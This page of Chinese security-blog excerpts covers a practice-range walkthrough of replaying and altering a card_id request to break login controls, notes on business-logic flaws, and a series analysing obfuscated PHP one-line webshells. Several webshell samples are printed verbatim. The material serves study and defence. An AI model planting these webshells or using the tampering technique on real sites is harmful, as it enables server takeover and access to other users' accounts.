一、身份认证失效漏洞实战 1.在墨者学院开启靶场，查看靶场目标。 2.访问靶场。 3.打开burp抓包，用靶场提供的账号登录。 4.查看burp，可以发现一个带有card_id的GET包。重放返回test账号的信息。（card_id值为20128880322） 5.修改 ...

业务逻辑漏洞 基础知识补充： User-Agent User Agent中文名为用户代理，简称 UA，它是一个特殊字符串头，使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本 ...

、前端知识。 2、启动靶场环境，看到一个登录页面，已给出测试账户test/test，尝试登录抓包。 ...

WebShell代码分析溯源(一) 一、一句话变形马样本 <?php $_GET['POST']($_POST['GET']);?> 二、代码分析 1、调整代码格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析 ...

WebShell代码分析溯源(四) 一、一句话变形马样本 <?php ...

背景知识 substr函数介绍 string substring(string, start, length) string substr(string, start, length) 第一个 ...

前言 大家好，我是一个渗透测试的爱好者和初学者，从事网络安全相关工作，由于爱好网上和朋友处找了好多关于渗透的视频、工具等资料，然后自己找了一个靶场，想把自己练习的体会和过程分享出来，希望能对其他渗透爱好者、初学者能有一些帮助。本人发布的内容为技术交流，不为其他用途。本人也是一个小白，还请技术大佬 ...

WebShell代码分析溯源(十一) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代码分析 1、调整代码格式 ...